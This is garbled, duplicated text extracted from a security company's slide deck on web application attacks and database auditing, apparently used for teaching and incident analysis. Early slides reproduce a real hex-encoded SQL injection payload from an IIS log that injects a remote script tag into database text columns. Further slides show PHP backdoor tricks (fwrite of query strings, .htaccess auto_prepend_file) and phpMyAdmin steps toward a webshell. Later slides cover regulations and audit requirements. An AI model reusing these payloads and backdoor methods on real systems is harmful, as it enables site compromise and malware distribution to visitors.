数据库安全审计课件.ppt

1、Web Application Security and Web Application Security and Database Audit MiscsDatabase Audit MiscsDBAPPSecurity IncDBAPPSecurity Inc杭州安恒信息技术有限公司杭州安恒信息技术有限公司FrankdbappSFrankdbappSFrank.F主讲人主讲人Frank.FanFrank.Fan范渊范渊杭州安恒信息技术有限公司杭州安恒信息技术有限公司DBAPPSecurity IncDBAPPSecurity IncFounder and CTOFounder and CT

2、O毕业于美国加州大学计算机科学方向硅谷国际著名安全公司从事十多年的技术研发和项目管理对应用安全、数据库安全和审计、compliance(如SOX,PCI,ISO17799/27001)有着非常资深经验第一个登上全球最权威黑帽子安全大会演讲的中国人CISSP,CISA,GCIH,GCIAOWASP中国分会副会长2008北京奥组委安全组成员浙江省信息安全协会安全服务委员会负责人本期要点：本期要点：FWebWeb应用安全挑战和分析应用安全挑战和分析F数据库审计数据库审计 安全风险安全风险+管理风险管理风险 -审计审计主要内容主要内容F公司简介公司简介F数据库安全审计概念数据库安全审计概念F各类规范要

3、求和数据库各类规范要求和数据库审计系统需求分析审计系统需求分析F明御数据库审计与风险控制系统明御数据库审计与风险控制系统F案例分析案例分析F小结小结2008北京奥组委安全产品和服务提供商北京奥组委安全产品和服务提供商作为2008北京奥组委安全产品和服务提供商，2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。Many Incident Handling Support安恒机密.|7黑客产业链黑客产业链入侵者入侵者入侵企业入侵企业服务器服务器窃取机密信息窃取机密信息(图纸、财务报表图纸、财务报表等）等）出售出售收费传播流氓软件获取金获取金钱钱拒绝服务攻击发送垃圾邮件

4、批量入批量入侵网站侵网站洗钱洗钱主动攻击勒索网站受雇攻击收取佣金安恒机密.|8F总共检测网站近总共检测网站近700700家家F90%90%网站存在严重安全隐患网站存在严重安全隐患F部分网站已经被挂马或被黑客控制部分网站已经被挂马或被黑客控制AgendaAgendaFMass Injection Attack Tool RevealedMass Injection Attack Tool RevealedFPHP Backdoor TipsPHP Backdoor TipsFSome hacking tips about phpmydaminSome hacking tips about php

5、mydamin9Mass Injection Tool RevealedMass Injection Tool RevealedFHow did We find it?How did We find it?From a Bot Machine during Incident Handling From a Bot Machine during Incident Handling10Real case in incident handling!Real case in incident handling!F2008-05-13 00:28:25 W3SVC628249937 22.1.1.11

6、POST/news_default.asp 2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007

7、200280032003500350029002C00400043002000760061007200630068540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0000610072002800320035003500290020004400450043004C004100520045002

8、0005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C0065006343007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300007

9、400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200

10、061002E00690064003D0062002E0069006400200061006E0064002000006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E007800740079007061002E00780074007900700065003D00270075002700200061006E006400200

11、0280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F00720020000065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D620

12、02E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720000310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004

13、500580054002000460052004F004D00200020005400610062006C006520004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002000570048004900005F0043007500720073006F007200200049004E0054004F002000400054002

14、C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020004200454C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B0040005400004

15、70049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00282B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280

16、076006100720063006800610072002C005B0027002B00400043002B000063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007027005D00290029002B00270027003C007300630072006900700074002000730

17、0720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A00003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045730

18、03E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200000580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004

19、0004300200045004E004400200043004C004F0053004500200054006149004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020000062006C0065005F0043007500720073006F00720020004400450041004C004

20、C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-5400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 Mozilla/3.0+(compatible;+Indy+Library)200 0 0204.13.70.223 Mozilla/3.0+(compatible;+Indy+Libr

21、ary)200 0 011Real contentReal contentFDECLARE T varchar(255),C varchar(255)DECLARE DECLARE T varchar(255),C varchar(255)DECLARE Table_Cursor CURSOR FOR select a.name,b.name from Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and sysobjects a,syscolumns b

22、where a.id=b.id and a.xtype=u and(b.xtype=99 or b.xtype=35 or a.xtype=u and(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0)BEGIN exe

23、c(update+T+WHILE(FETCH_STATUS=0)BEGIN exec(update+T+set set+C+=rtrim(convert(varchar,+C+)+script+C+=rtrim(convert(varchar,+C+)+)FETCH src=http:/ NEXT FROM Table_Cursor INTO T,C END CLOSE NEXT FROM Table_Cursor INTO T,C END CLOSE Table_Cursor DEALLOCATE Table_CursorTable_Cursor DEALLOCATE Table_Curso

24、r12Key part:Key part:Fscript src=http:/ Injection Tool RevealedMass Injection Tool Revealed14Mass Injection Tool RevealedMass Injection Tool Revealed15Mass Injection Tool-Config.iniMass Injection Tool-Config.iniFinitinitFedkey=inurl:(.aspx?-(gov)edkey=inurl:(.aspx?-(gov)自动产生自动产生 Franklimit=1000000ra

25、nklimit=1000000Fcipin=50cipin=50Ftimeout=20timeout=20Fprocess=1process=1Fretry=3retry=3Fthread=88thread=88Fbufferlength=10bufferlength=10Fcpu=115cpu=115Fsellang=0sellang=0Fscanmode=0scanmode=0Fchkbox1=1chkbox1=1Fchkbox2=0chkbox2=0Fchkbox3=1chkbox3=1Fchkbox4=0chkbox4=0Fchkbox5=1chkbox5=1Fchkbox6=0chk

26、box6=0Fchkbufferlength=1chkbufferlength=1Fchkranklimit=0chkranklimit=0FIgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AIgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AFIgnoreKey=Not Found#$D#$AIgn

27、oreKey=Not Found#$D#$A盗链盗链#$D#$A#$D#$A文件不存在文件不存在#$D#$A#$D#$A16PHP backdoor PHP backdoor FBasename()Basename()FInclude()Include()FEval()Eval()FPreg_replace()Preg_replace()1718Basename()Basename()?php?php$fp=fopen(c:/test.php,w);$fp=fopen(c:/test.php,w);fwrite($fp,fwrite($fp,basename($_SERVERQUERY_STR

28、ING);basename($_SERVERQUERY_STRING);fclose($fp);fclose($fp);/http:/127.0.0.1/Basename.php?phpinfo();?/http:/127.0.0.1/Basename.php?19Include()Include()Modify configuration fileModify configuration fileFphp.iniphp.iniF.htaccess.htaccess 20Update php.iniUpdate php.ini21Update.htaccessUpdate.htaccess文件

29、文件.htaccess .htaccess#php_value auto_prepend_file.htaccessphp_value auto_prepend_file.htaccess22Some hacking tips about phpmydaminSome hacking tips about phpmydaminF1.Get phpmyadmins absolute path(Multi 1.Get phpmyadmins absolute path(Multi version support)version support)F2.Inference Variable info(

30、mysql2.Inference Variable info(mysql related)related)F3 3、Package(default stuff)Package(default stuff)F4 4、Error info inferenceError info inferenceF5 5、phpinfophpinfo EnableEnableF6 6、InjectionInjectionF7 7、Get webshellGet webshellGet phpmyadmins absolute pathGet phpmyadmins absolute pathhttp:/xx/ph

31、pmyadmin/themes/darkblue_orange/http:/xx/phpmyadmin/themes/darkblue_orange/layout.inc.phplayout.inc.phphttp:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpmyadmin/libraries/select_lang.lhttp:/xx/phpmyadmin/libraries/select_lang.lib.phpib.phphttp:/xx/phpmyadmin/scripts

32、/check_lang.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/libraries/export/xls.phhttp:/xx/phpmyadmin/libraries/export/xls.php p三、三、PackagePackageFAPMServ C:APM_SetupServerphpMyAdminAPMServ C:APM_SetupServerphpMyAdminFAppServ C:AppServwwwphpMyAdminAppServ C:AppServwwwphpMyAdminFXAM

33、PP C:xamppphpMyAdminXAMPP C:xamppphpMyAdminF.七、七、Get WebshellGet WebshellUse dumpfileUse dumpfile to get webshellto get webshellReal Case used some code hardeningReal Case used some code hardeningReal Case Cookie InjectionReal Case Cookie InjectionDefense TipsDefense TipsFWeb Application Firewall Ch

34、allengeWeb Application Firewall ChallengeFCode and Configuration hardening ChallengeCode and Configuration hardening Challenge30WebWeb Application Firewall(WAF)Application Firewall(WAF)历史历史FWebWeb应用防火墙第一代：应用防火墙第一代：流方式流方式FWebWeb应用防火墙第二代：应用防火墙第二代：第二代第二代WebWeb应用防火墙应用防火墙F支持全透明直连部署支持全透明直连部署FHTTPSHTTPS全透明

35、支持全透明支持FWebWeb加速功能加速功能F抗各类抗各类WebWeb攻击攻击F第二部分：数据库审计概念第二部分：数据库审计概念审计审计信息安全审计信息安全审计数据库审计数据库审计审计审计F检查、验证目标的准确性和完整性，用以防止虚假检查、验证目标的准确性和完整性，用以防止虚假数据和欺骗行为，以及是否符合既定的标准、标竿数据和欺骗行为，以及是否符合既定的标准、标竿和其它审计原则和其它审计原则萨班斯法案萨班斯法案美国史上最严厉的审计法则美国史上最严厉的审计法则企业内部控制规范企业内部控制规范国内审计规范，主要目的在于加强和规国内审计规范，主要目的在于加强和规 范企业内部控制，提高企业经营管理水平

36、和风险行为防范能力范企业内部控制，提高企业经营管理水平和风险行为防范能力财务审计、财务审计、ITIT审计审计信息安全审计信息安全审计信息安全审计信息安全审计F收集并评估证据以决定一个计算机系统是否有效做收集并评估证据以决定一个计算机系统是否有效做到保护资产、维护数据完整、完成目标，同时最经济到保护资产、维护数据完整、完成目标，同时最经济的使用资源的使用资源萨班斯法案萨班斯法案强调加强与财务报表相关的强调加强与财务报表相关的ITIT系统内部控制，系统内部控制，其中，其中，ITIT系统内部控制是紧密围绕信息安全审计这一核心的。系统内部控制是紧密围绕信息安全审计这一核心的。巴赛尔新资本协定巴赛尔新资

37、本协定(Basel II)(Basel II)，要求全球银行必须做好风险控管，要求全球银行必须做好风险控管(risk management)(risk management)，而这项，而这项“金融作业风险金融作业风险”的防范正需要业务信的防范正需要业务信息安全审计为依托。息安全审计为依托。企业内部控制具体规范企业内部控制具体规范明确要求计算机信息系统应采取权明确要求计算机信息系统应采取权责分配及职责分工、建立访问安全策略等审计措施以加强责分配及职责分工、建立访问安全策略等审计措施以加强提高信息提高信息系统的可靠性、稳定性、安全性及数据的完整性和准确性。系统的可靠性、稳定性、安全性及数据的完整性

38、和准确性。ISO17799ISO17799、CCCC、PCIPCI数据库安全审计数据库安全审计F确保数据的完整性数据库安全审计，通过对数据确保数据的完整性数据库安全审计，通过对数据库安全性相关的操作进行审计，监测指定用户的行库安全性相关的操作进行审计，监测指定用户的行为，掌握数据库使用状况。为，掌握数据库使用状况。F数据库审计是信息安全审计的重要组成部分。数据库审计是信息安全审计的重要组成部分。F数据库审计的目的在于数据库审计的目的在于确保数据的完整性确保数据的完整性全面了解数据库实际发生的情况全面了解数据库实际发生的情况可疑行为发生时可以自动启动预先设置的告警流程，防范数可疑行为发生时可以自

39、动启动预先设置的告警流程，防范数据库风险的发生据库风险的发生F第三部分：数据库审计系统需求分析第三部分：数据库审计系统需求分析安全需求分析安全需求分析数据库安全攻击事件正在升级数据库安全分析现有安全解决方案无法有效应对数据库攻击行为相关法律法规相关法律法规数据库审计系统应满足的要求数据库审计系统应满足的要求F数据库安全攻击事件数据库安全攻击事件某系统开发工程师通过互联网入侵移动中心数据库，盗取冲值卡某系统开发工程师通过互联网入侵移动中心数据库，盗取冲值卡某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某网游公司内部数据库管理人

40、员通过违规修改数据库数据盗窃网游点某网游公司内部数据库管理人员通过违规修改数据库数据盗窃网游点卡卡黑客利用黑客利用SQLSQL注入攻击，入侵某防病毒软件数据库中心，窃取大量机注入攻击，入侵某防病毒软件数据库中心，窃取大量机密信息，导致该防病毒软件公司严重损失密信息，导致该防病毒软件公司严重损失某证券交易所内部数据库造黑客股民入侵，盗窃证券交易内部报告某证券交易所内部数据库造黑客股民入侵，盗窃证券交易内部报告F针对数据库进行的安全攻击事件正在升级！针对数据库进行的安全攻击事件正在升级！数据库审计系统需求分析数据库审计系统需求分析安全需求分析安全需求分析数据库安全分析数据库安全分析数据库的重要性数

41、据库的重要性是企业数据信息的最终载体是企业业务系统的核心数据库面临的风险数据库面临的风险内部人员误操作、内部人员误操作、违规操作、越权操违规操作、越权操作作第三方维护人员安第三方维护人员安全隐患全隐患最高权限用户操作最高权限用户操作多人共用一个帐号多人共用一个帐号员工离职后泄漏公员工离职后泄漏公司信息司信息管理风险管理风险技术风险技术风险网络层攻击网络层攻击操作系统漏洞操作系统漏洞应用程序攻击应用程序攻击数据库攻击数据库攻击应用提供商的后应用提供商的后门门离职员工的后门离职员工的后门审计风险审计风险日志缺失或不完日志缺失或不完整整安全事件难于追安全事件难于追溯或定位溯或定位使企业核心数据库面临

42、更大的安全挑战现有的安全解决方案现有的安全解决方案应用前端应用前端交换机交换机防火墙防火墙路由器路由器2/32/3层交换机层交换机WebWeb服务器服务器网络存储网络存储应用服务器应用服务器数据库服务器数据库服务器因特网因特网IDS/IPSIDS/IPS防病毒工具软件防火墙漏洞扫描软件PKI/SSO重要应用部署于防火墙内只开放需要的端口限制特殊的源地址网络监听入侵检测告警现有的安全解决方案不能有效应对现有的安全解决方案不能有效应对防火墙防火墙只能检测网络层的攻击无法阻拦来自网络内部的非法操作无法动态识别或自适应地调整规则对WEB应用,端口80或443必须开放IDS/IPSIDS/IPS只检测已

43、知特征对数据层的信息缺乏深度分析，误报/漏报率很高没有对session/user的跟踪；不能保护SSL流量针对网络层F由于数据库本身的重要性以及脆弱性，国家以及国由于数据库本身的重要性以及脆弱性，国家以及国际上都制定了相关的法律法规来指导并规范数据库际上都制定了相关的法律法规来指导并规范数据库信息系统的安全建设信息系统的安全建设F其中最重要的是明确了独立数据库审计系统的必要其中最重要的是明确了独立数据库审计系统的必要性和重要性性和重要性数据库审计系统需求分析数据库审计系统需求分析相关法律法规相关法律法规F信息安全等级保护测评准则信息安全等级保护测评准则信息安全等级保护测评准则信息安全等级保护测

44、评准则第六章第六章“第二级安全控制测评第二级安全控制测评”中第一节中第一节“安全技术测评安全技术测评”主机系统安全审计中明确提出：主机系统安全审计中明确提出：安全审计应覆盖到服务器上的每个操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等审计记录应受到保护避免受到未预期的删除、修改或覆盖等信息安全等级保护测评准则信息安全等级保护测评准则第七章第七章“第三级安全控制测评第三级安全控制测评”中中第一节第一节“安全技术测评安全技术测评”主机系统安全审计中明

45、确提出：主机系统安全审计中明确提出：安全审计应覆盖到应用系统的每个操作系统用户和数据库用户安全审计应记录应用系统重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统功能的执行等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等信息安全等级保护测评准则信息安全等级保护测评准则第七章第七章“第四级安全控制测评第四级安全控制测评”中第中第一节一节“安全技术测评安全技术测评”主机

46、系统安全审计中明确提出：主机系统安全审计中明确提出：安全审计应覆盖到服务器和客户端上的所有操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、客体敏感标记、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等安全审计应能跟踪监测到可能的安全侵害事件，并终止违规进程安全审计应根据信息系统的统一安全策略，实现集中审计系统设备

47、时钟应与时钟服务器时钟保持同步F等级保护数据库管理技术要求等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求第四章第四章“数据库数据库管理系统安全技术要求管理系统安全技术要求”中第四节中第四节“数据库安全审计数据库安全审计”中明确提出中明确提出数据库数据库管理系统的安全审计应：管理系统的安全审计应：建立独立的安全审计系统定义与数据库安全相关的审计事件设置专门的安全审计员设置专门用于存储数据库系统审计数据的安全审计库提供适用于数据库系统的安全审计设置、分析和查阅的工具ISO ISO 体系体系FBS7799/ISO27001BS779

48、9/ISO27001BS7799-1BS7799-1（ISOISO）19991999信息技术信息技术信息安全管理业务规范信息安全管理业务规范第第十章十章“系统开发与维护系统开发与维护”中第二节中第二节“应用系统中的安全应用系统中的安全”明确提出：明确提出：为“防止应用系统中用户数据的丢失、修改或滥用”，“应用系统应设计包含适当的控制措施和审计追踪或活动日志记录，包括在用户写入的应用程序中。这些系统应包括对输入数据、内部处理和输出数据的检验功能。”BS7799-2 2002 BS7799-2 2002 信息技术信息技术信息安全管理系统规范信息安全管理系统规范第四章第四章“详细监控详细监控”中第七

49、节中第七节“访问控制访问控制”第第7 7小节小节“监控对系统的访问监控对系统的访问和使用和使用”明确提出：明确提出：为实现“探测未经授权的行为”的目标，“应提供对异常事件和与安全相关事件的审计日志”。FISO15408ISO15408ISO15408-2 ISO15408-2 安全功能要求安全功能要求明确要求数据库安全审计应包括：明确要求数据库安全审计应包括：识别、记录、存储和分析那些与安全相关活动（即由TSP 控制的活动）有关的信息。检查审计记录结果可用来判断发生了哪些安全相关活动以及哪个用户要对这些活动负责。F支付卡行业数据安全标准（支付卡行业数据安全标准（PCIPCI）PCIPCI验证访

50、问任何数据库（其中包括持卡人数据）的所有操作。这包验证访问任何数据库（其中包括持卡人数据）的所有操作。这包括应用程序、管理员和所有其他用户的访问操作。括应用程序、管理员和所有其他用户的访问操作。8.5.16.a 8.5.16.a 检查数据库和应用程序配置设置，以确定用户身份认证和数据库检查数据库和应用程序配置设置，以确定用户身份认证和数据库的访问包括以下内容：的访问包括以下内容：所有用户在访问前必须进行身份认证所有的用户访问数据库、查询数据库和操作数据库（例如移动、复制、删除）行为必须只能通过编程方法（例如，通过存储的程序）只有数据库管理员才能直接访问数据库或查询数据库。8.5.16.b 8.